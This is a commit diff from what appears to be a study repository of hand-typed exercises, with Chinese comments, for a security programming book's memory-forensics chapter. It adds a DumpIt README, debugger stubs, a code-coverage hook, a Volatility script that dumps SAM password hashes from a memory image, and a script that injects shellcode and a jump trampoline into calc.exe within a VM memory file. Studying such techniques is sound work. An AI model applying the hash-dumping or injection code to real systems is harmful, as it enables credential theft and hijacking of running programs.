dayuxiyou
diff --git a/‎我手敲的代码(中文注释)/chapter11/DumpIt/DumpIt.exe
Copy file name to clipboard
203 KB b/‎我手敲的代码(中文注释)/chapter11/DumpIt/DumpIt.exe
Copy file name to clipboard
203 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/DumpIt/README.txt
Copy file name to clipboard
+14Lines changed: 14 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter11/DumpIt/README.txt
Copy file name to clipboard
+14Lines changed: 14 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter11/cmeasure.bin
Copy file name to clipboard
138 Bytes b/‎我手敲的代码(中文注释)/chapter11/cmeasure.bin
Copy file name to clipboard
138 Bytes
diff --git a/‎我手敲的代码(中文注释)/chapter11/code_inject.py
Copy file name to clipboard
+114Lines changed: 114 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter11/code_inject.py
Copy file name to clipboard
+114Lines changed: 114 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter11/codecoverage.py
Copy file name to clipboard
+37Lines changed: 37 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter11/codecoverage.py
Copy file name to clipboard
+37Lines changed: 37 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter11/grabhashes.py
Copy file name to clipboard
+70Lines changed: 70 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter11/grabhashes.py
Copy file name to clipboard
+70Lines changed: 70 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/__init__.py
Copy file name to clipboard
+1Lines changed: 1 addition & 0 deletions b/‎我手敲的代码(中文注释)/chapter11/immlib/__init__.py
Copy file name to clipboard
+1Lines changed: 1 addition & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_bsddb.lib
Copy file name to clipboard
1.85 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_bsddb.lib
Copy file name to clipboard
1.85 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_ctypes.lib
Copy file name to clipboard
1.68 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_ctypes.lib
Copy file name to clipboard
1.68 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_ctypes_test.lib
Copy file name to clipboard
18.8 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_ctypes_test.lib
Copy file name to clipboard
18.8 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_elementtree.lib
Copy file name to clipboard
1.79 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_elementtree.lib
Copy file name to clipboard
1.79 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_hashlib.lib
Copy file name to clipboard
1.7 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_hashlib.lib
Copy file name to clipboard
1.7 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_msi.lib
Copy file name to clipboard
1.63 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_msi.lib
Copy file name to clipboard
1.63 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_socket.lib
Copy file name to clipboard
1.88 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_socket.lib
Copy file name to clipboard
1.88 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_sqlite3.lib
Copy file name to clipboard
1.7 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_sqlite3.lib
Copy file name to clipboard
1.7 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_ssl.lib
Copy file name to clipboard
1.63 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_ssl.lib
Copy file name to clipboard
1.63 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_testcapi.lib
Copy file name to clipboard
1.71 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_testcapi.lib
Copy file name to clipboard
1.71 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/_tkinter.lib
Copy file name to clipboard
1.7 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/_tkinter.lib
Copy file name to clipboard
1.7 KB
diff --git a/‎我手敲的代码(中文注释)/chapter11/immlib/bz2.lib
Copy file name to clipboard
1.61 KB b/‎我手敲的代码(中文注释)/chapter11/immlib/bz2.lib
Copy file name to clipboard
1.61 KB
@@ -0,0 +1,14 @@
+- MoonSols Windows Memory "DumpIt" v1.3.2.20110401 -  
+
+Copyright (C) 2010 - 2011, Matthieu Suiche <http://www.msuiche.net>
+Copyright (C) 2010 - 2011, MoonSols <http://www.moonsols.com>
+
+All executables and drivers are NOT redistributable, and licence applies only to one single
+user. Reverse engineering is prohibited.
+
+You are experiencing any problems contact us at : support@moonsols.com
+
+
+This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
+The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
+Perfect to deploy the executable on USB keys, for quick incident responses needs.
@@ -0,0 +1,114 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: code_inject.py
+@time: 2016/3/16 13:04
+"""
+
+import sys
+import struct
+
+equals_button = 0x01005D51
+
+# 要分析的内存文件位置
+memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
+slack_space = None
+trampoline_offset = None
+
+# 读入我们的shellcode
+sc_fd = open("cmeasure.bin", "rb")
+sc = sc_fd.read()
+sc_fd.close()
+
+sys.path.append("D:\\volatility-2.3")
+
+import volatility.conf as conf
+import volatility.registry as registry
+
+registry.PluginImporter()
+config = conf.ConfObject()
+
+import volatility.commands as commands
+import volatility.addrspace as addrspace
+
+registry.register_global_options(config, commands.Command)
+registry.register_global_options(config, addrspace.BaseAddressSpace)
+
+config.parse_options()
+config.PROFILE = "WinXPSP3x86"
+config.LOCATION = "file://%s" % memory_file
+
+import volatility.plugins.taskmods as taskmods
+
+p = taskmods.PSList(config)
+for process in p.calculate():
+    if str(process.ImageFileName) == "calc.exe":
+        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
+        print "[*] Hunting for physical offsets...please wait."
+
+        address_space = process.get_process_address_space()
+        pages = address_space.get_available_pages()
+
+        # page[0]:页面地址
+        # page[1]：页面大小
+        for page in pages:
+            physical = address_space.vtop(page[0])
+            if physical is not None:
+                fd = open(memory_file, "r+")
+                fd.seek(physical)
+                buf = fd.read(page[1])
+
+                try:
+                    offset = buf.index("\x00" * len(sc))
+                    slack_space = page[0] + offset
+
+                    print "[*] Found good shellcode location!"
+                    print "[*] Virtual address: 0x%08x" % slack_space
+                    print "[*] Physical address: 0x%08x" % (physical + offset)
+                    print "[*] Injecting shellcode."
+
+                    fd.seek(physical + offset)
+                    fd.write(sc)
+                    fd.flush()
+
+                    # 创建我们的跳转代码
+                    # 对应的汇编指令为：
+                    # mov ebx, ADDRESS_OF_SHELLCODE( shellcode地址)
+                    # jmp ebx
+                    tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
+                    tramp += "\xff\xe3"
+
+                    if trampoline_offset is not None:
+                        break
+
+                except:
+                    pass
+
+                fd.close()
+
+            # 查看目标代码的位置
+            if page[0] <= equals_button and equals_button < (page[0] + page[1] -7):
+                print "[*] Found our trampoline target at: 0x%08x" % (physical)
+                # 计算虚拟偏移
+                v_offset = equals_button - page[0]
+                # 计算物理偏移
+                trampoline_offset = physical+ v_offset
+
+                print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
+
+                if slack_space is not None:
+                    break
+
+
+        print "[*] Writing trampoline..."
+
+        fd = open(memory_file, "r+")
+        fd.seek(trampoline_offset)
+        fd.write(tramp)
+        fd.close()
+
+        print "[*] Done injecting code."
+
+
@@ -0,0 +1,37 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: codecoverage.py
+@time: 2016/3/15 23:15
+"""
+
+from immlib import *
+
+class cc_hook(LogBpHook):
+
+    def __init__(self):
+        LogBpHook.__init__(self)
+        self.imm = Debugger()
+
+    def run(self, regs):
+        self.imm.log("%08x" % regs['EIP'], regs['EIP'])
+        self.imm.deleteBreakpoint(regs['EIP'])
+        return
+
+
+def main(args):
+
+    imm = Debugger()
+
+    calc = imm.getModule("calc.exe")
+    imm.analyseCode(calc.getCodebase())
+
+    functions = imm.getAllFunctions(calc.getCodebase())
+
+    hooker = cc_hook()
+    for function in functions:
+        hooker.add("%08x" % function, function)
+
+    return "Tracking %d functions." % len(functions)
@@ -0,0 +1,70 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: grabhashes.py
+@time: 2016/3/15 20:16
+"""
+
+import sys
+import struct
+import volatility.conf as conf
+import volatility.registry as registry
+
+# 要分析的内存文件位置
+memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
+
+# volatility的下载的路径
+sys.path.append("D:\\volatility-2.3")
+
+registry.PluginImporter()
+config = conf.ConfObject()
+
+import volatility.commands as commands
+import volatility.addrspace as addrspace
+
+config.parse_options()
+config.PROFILE = "WinXPSP3x86"
+config.LOCATION = "file://%s" % memory_file
+
+# 注册全局参数
+registry.register_global_options(config, commands.Command)
+registry.register_global_options(config, addrspace.BaseAddressSpace)
+
+from volatility.plugins.registry.registryapi import RegistryApi
+from volatility.plugins.registry.lsadump import HashDump
+
+# 实例化一个RegistryApi类对象（包含常用的注册表帮助类）
+registry = RegistryApi(config)
+# 等同与hivelist命令
+registry.populate_offsets()
+
+sam_offset = None
+sys_offset = None
+
+# 循环检索SAM和system键值
+for offset in registry.all_offsets:
+    if registry.all_offsets[offset].endswith("\\SAM"):
+        sam_offset = offset
+        print "[*] SAM: 0x%08x" % offset
+
+    if registry.all_offsets[offset].endswith("\\system"):
+        sys_offset = offset
+        print "[*] System: 0x%08x" % offset
+
+    if sam_offset is not None and sys_offset is not None:
+        config.sys_offset = sys_offset
+        config.sam_offset = sam_offset
+
+        # 创建HashDump对象
+        hashdump = HashDump(config)
+
+        for hash in hashdump.calculate():
+            print hash
+
+        break
+
+
+if sam_offset is None or sys_offset is None:
+    print "[*] Failed to find the system or SAM offsets."
@@ -0,0 +1 @@
+all = ["immutils"] #for now